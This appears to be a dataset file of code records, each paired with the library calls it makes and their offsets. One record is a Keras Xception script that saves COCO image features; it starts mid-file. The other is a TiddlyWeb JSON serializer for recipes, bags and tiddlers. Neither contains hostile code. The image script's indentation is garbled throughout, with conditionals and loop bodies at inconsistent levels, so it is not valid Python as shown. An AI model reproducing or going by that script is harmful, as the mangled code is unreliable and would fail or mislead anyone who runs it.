imgPath = os.path.join(imgDir, filename)
        img_id = int(filename[-16:-4])  # 12-digit COCO image id from the file name
img = load_img(imgPath)
width, height = img.size
        if width >= height:
img = img.resize((size2, size1), resample=Image.BICUBIC)
img_array = img_to_array(img)
img_array = preprocess_input(img_array)
# img_array = np.tile(img,(32,1,1,1))
img_array = np.expand_dims(img_array, axis=0)
predictions = model.predict(img_array)
            pred = predictions[0].reshape(24, 2048)
            np.save(imgDir + saveDir + "/" + str(img_id), pred)
            if i < 1000 and i % 100 == 0:
print(i)
if i % 1000 == 0:
print(i)
i += 1
model = VQAModel.createModelXception((size2, size1, 3))
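# Second pass: portrait images (width < height), with swapped input dimensions.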
for file in os.listdir(directory):
filename = os.fsdecode(file)
if filename.endswith(".jpg"):
imgPath = os.path.join(imgDir, filename)
        img_id = int(filename[-16:-4])  # 12-digit COCO image id from the file name
img = load_img(imgPath)
width, height = img.size
        if width < height:
img = img.resize((size1, size2), resample=Image.BICUBIC)
img_array = img_to_array(img)
img_array = preprocess_input(img_array)
# img_array = np.tile(img,(32,1,1,1))
img_array = np.expand_dims(img_array, axis=0)
# plt.imshow((img_array[0] + 1)/2)
# plt.show()
predictions = model.predict(img_array)
            pred = predictions[0].reshape(24, 2048)
            np.save(imgDir + saveDir + "/" + str(img_id), pred)
if i % 1000 == 0:
print(i)
i += 1
|
[
"os.fsdecode",
"keras.applications.xception.preprocess_input",
"numpy.expand_dims",
"keras.preprocessing.image.img_to_array",
"keras.preprocessing.image.load_img",
"os.fsencode",
"os.path.join",
"os.listdir",
"VQAModel.createModelXception"
] |
[((1165, 1184), 'os.fsencode', 'os.fsencode', (['imgDir'], {}), '(imgDir)\n', (1176, 1184), False, 'import os\n'), ((1248, 1295), 'VQAModel.createModelXception', 'VQAModel.createModelXception', (['(size1, size2, 3)'], {}), '((size1, size2, 3))\n', (1276, 1295), False, 'import VQAModel\n'), ((1324, 1345), 'os.listdir', 'os.listdir', (['directory'], {}), '(directory)\n', (1334, 1345), False, 'import os\n'), ((2167, 2214), 'VQAModel.createModelXception', 'VQAModel.createModelXception', (['(size2, size1, 3)'], {}), '((size2, size1, 3))\n', (2195, 2214), False, 'import VQAModel\n'), ((2227, 2248), 'os.listdir', 'os.listdir', (['directory'], {}), '(directory)\n', (2237, 2248), False, 'import os\n'), ((1362, 1379), 'os.fsdecode', 'os.fsdecode', (['file'], {}), '(file)\n', (1373, 1379), False, 'import os\n'), ((2265, 2282), 'os.fsdecode', 'os.fsdecode', (['file'], {}), '(file)\n', (2276, 2282), False, 'import os\n'), ((1432, 1462), 'os.path.join', 'os.path.join', (['imgDir', 'filename'], {}), '(imgDir, filename)\n', (1444, 1462), False, 'import os\n'), ((1512, 1529), 'keras.preprocessing.image.load_img', 'load_img', (['imgPath'], {}), '(imgPath)\n', (1520, 1529), False, 'from keras.preprocessing.image import load_img, img_to_array, ImageDataGenerator\n'), ((2335, 2365), 'os.path.join', 'os.path.join', (['imgDir', 'filename'], {}), '(imgDir, filename)\n', (2347, 2365), False, 'import os\n'), ((2415, 2432), 'keras.preprocessing.image.load_img', 'load_img', (['imgPath'], {}), '(imgPath)\n', (2423, 2432), False, 'from keras.preprocessing.image import load_img, img_to_array, ImageDataGenerator\n'), ((1685, 1702), 'keras.preprocessing.image.img_to_array', 'img_to_array', (['img'], {}), '(img)\n', (1697, 1702), False, 'from keras.preprocessing.image import load_img, img_to_array, ImageDataGenerator\n'), ((1727, 1754), 'keras.applications.xception.preprocess_input', 'preprocess_input', (['img_array'], {}), '(img_array)\n', (1743, 1754), False, 'from keras.applications.xception import decode_predictions, preprocess_input\n'), ((1829, 1862), 'numpy.expand_dims', 'np.expand_dims', (['img_array'], {'axis': '(0)'}), '(img_array, axis=0)\n', (1843, 1862), True, 'import numpy as np\n'), ((2587, 2604), 'keras.preprocessing.image.img_to_array', 'img_to_array', (['img'], {}), '(img)\n', (2599, 2604), False, 'from keras.preprocessing.image import load_img, img_to_array, ImageDataGenerator\n'), ((2629, 2656), 'keras.applications.xception.preprocess_input', 'preprocess_input', (['img_array'], {}), '(img_array)\n', (2645, 2656), False, 'from keras.applications.xception import decode_predictions, preprocess_input\n'), ((2731, 2764), 'numpy.expand_dims', 'np.expand_dims', (['img_array'], {'axis': '(0)'}), '(img_array, axis=0)\n', (2745, 2764), True, 'import numpy as np\n')]
|
"""
JSON based serializer.
"""
import simplejson
from base64 import b64encode, b64decode
from tiddlyweb.serializations import SerializationInterface
from tiddlyweb.model.bag import Bag
from tiddlyweb.model.policy import Policy
class Serialization(SerializationInterface):
"""
Turn various entities to and from JSON.
"""
def list_recipes(self, recipes):
"""
Create a JSON list of recipe names from
the provided recipes.
"""
return simplejson.dumps([recipe.name for recipe in recipes])
def list_bags(self, bags):
"""
Create a JSON list of bag names from the
provided bags.
"""
return simplejson.dumps([bag.name for bag in bags])
def list_tiddlers(self, bag):
"""
List the tiddlers in a bag as JSON.
The format is a list of dicts in
the form described by self._tiddler_dict.
"""
return simplejson.dumps([self._tiddler_dict(tiddler) for tiddler in bag.list_tiddlers()])
def recipe_as(self, recipe):
"""
A recipe as a JSON dictionary.
"""
policy = recipe.policy
policy_dict = {}
for key in ['owner', 'read', 'write', 'create', 'delete', 'manage']:
policy_dict[key] = getattr(policy, key)
return simplejson.dumps(dict(desc=recipe.desc, policy=policy_dict, recipe=recipe.get_recipe()))
def as_recipe(self, recipe, input_string):
"""
Turn a JSON dictionary into a Recipe
if it is in the proper form. Include
the policy.
"""
info = simplejson.loads(input_string)
try:
recipe.set_recipe(info['recipe'])
recipe.desc = info['desc']
if info['policy']:
recipe.policy = Policy()
for key, value in info['policy'].items():
recipe.policy.__setattr__(key, value)
except KeyError:
pass
return recipe
def bag_as(self, bag):
"""
Create a JSON dictionary representing
a Bag and Policy.
"""
policy = bag.policy
policy_dict = {}
for key in ['owner', 'read', 'write', 'create', 'delete', 'manage']:
policy_dict[key] = getattr(policy, key)
info = dict(policy=policy_dict, desc=bag.desc)
return simplejson.dumps(info)
def as_bag(self, bag, input_string):
"""
Turn a JSON string into a bag.
"""
info = simplejson.loads(input_string)
if info['policy']:
bag.policy = Policy()
for key, value in info['policy'].items():
bag.policy.__setattr__(key, value)
bag.desc = info.get('desc', '')
return bag
def tiddler_as(self, tiddler):
"""
Create a JSON dictionary representing
a tiddler, as described by _tiddler_dict
plus the text of the tiddler.
"""
tiddler_dict = self._tiddler_dict(tiddler)
if tiddler.type and tiddler.type != 'None':
tiddler_dict['text'] = b64encode(tiddler.text)
else:
tiddler_dict['text'] = tiddler.text
return simplejson.dumps(tiddler_dict)
def as_tiddler(self, tiddler, input_string):
"""
Turn a JSON dictionary into a Tiddler.
"""
dict_from_input = simplejson.loads(input_string)
accepted_keys = ['created', 'modified', 'modifier', 'tags', 'fields', 'text', 'type']
        for key, value in dict_from_input.items():  # items() works on both Python 2 and 3
if value and key in accepted_keys:
setattr(tiddler, key, value)
if tiddler.type and tiddler.type != 'None':
tiddler.text = b64decode(tiddler.text)
return tiddler
def _tiddler_dict(self, tiddler):
"""
Select fields from a tiddler to create
        a dictionary.
"""
unwanted_keys = ['text', 'store']
wanted_keys = [attribute for attribute in tiddler.slots if attribute not in unwanted_keys]
wanted_info = {}
for attribute in wanted_keys:
wanted_info[attribute] = getattr(tiddler, attribute, None)
wanted_info['permissions'] = self._tiddler_permissions(tiddler)
try:
fat = self.environ['tiddlyweb.query'].get('fat', [None])[0]
if fat:
wanted_info['text'] = tiddler.text
except KeyError:
pass # tiddlyweb.query is not there
return dict(wanted_info)
def _tiddler_permissions(self, tiddler):
"""
Make a list of the permissions the current user has
on this tiddler.
"""
perms = []
bag = Bag(tiddler.bag)
if tiddler.store:
bag = tiddler.store.get(bag)
if 'tiddlyweb.usersign' in self.environ:
perms = bag.policy.user_perms(self.environ['tiddlyweb.usersign'])
return perms
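# Illustrative round-trip (assumes SerializationInterface accepts a
# WSGI-like environ dict in its constructor):
#   serializer = Serialization(environ={})
#   json_text = serializer.bag_as(Bag('demo'))
#   restored = serializer.as_bag(Bag('demo'), json_text)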
|
[
"simplejson.dumps",
"tiddlyweb.model.bag.Bag",
"base64.b64decode",
"tiddlyweb.model.policy.Policy",
"base64.b64encode",
"simplejson.loads"
] |
[((492, 545), 'simplejson.dumps', 'simplejson.dumps', (['[recipe.name for recipe in recipes]'], {}), '([recipe.name for recipe in recipes])\n', (508, 545), False, 'import simplejson\n'), ((689, 733), 'simplejson.dumps', 'simplejson.dumps', (['[bag.name for bag in bags]'], {}), '([bag.name for bag in bags])\n', (705, 733), False, 'import simplejson\n'), ((1609, 1639), 'simplejson.loads', 'simplejson.loads', (['input_string'], {}), '(input_string)\n', (1625, 1639), False, 'import simplejson\n'), ((2366, 2388), 'simplejson.dumps', 'simplejson.dumps', (['info'], {}), '(info)\n', (2382, 2388), False, 'import simplejson\n'), ((2509, 2539), 'simplejson.loads', 'simplejson.loads', (['input_string'], {}), '(input_string)\n', (2525, 2539), False, 'import simplejson\n'), ((3198, 3228), 'simplejson.dumps', 'simplejson.dumps', (['tiddler_dict'], {}), '(tiddler_dict)\n', (3214, 3228), False, 'import simplejson\n'), ((3376, 3406), 'simplejson.loads', 'simplejson.loads', (['input_string'], {}), '(input_string)\n', (3392, 3406), False, 'import simplejson\n'), ((4703, 4719), 'tiddlyweb.model.bag.Bag', 'Bag', (['tiddler.bag'], {}), '(tiddler.bag)\n', (4706, 4719), False, 'from tiddlyweb.model.bag import Bag\n'), ((2592, 2600), 'tiddlyweb.model.policy.Policy', 'Policy', ([], {}), '()\n', (2598, 2600), False, 'from tiddlyweb.model.policy import Policy\n'), ((3096, 3119), 'base64.b64encode', 'b64encode', (['tiddler.text'], {}), '(tiddler.text)\n', (3105, 3119), False, 'from base64 import b64encode, b64decode\n'), ((3727, 3750), 'base64.b64decode', 'b64decode', (['tiddler.text'], {}), '(tiddler.text)\n', (3736, 3750), False, 'from base64 import b64encode, b64decode\n'), ((1801, 1809), 'tiddlyweb.model.policy.Policy', 'Policy', ([], {}), '()\n', (1807, 1809), False, 'from tiddlyweb.model.policy import Policy\n')]
|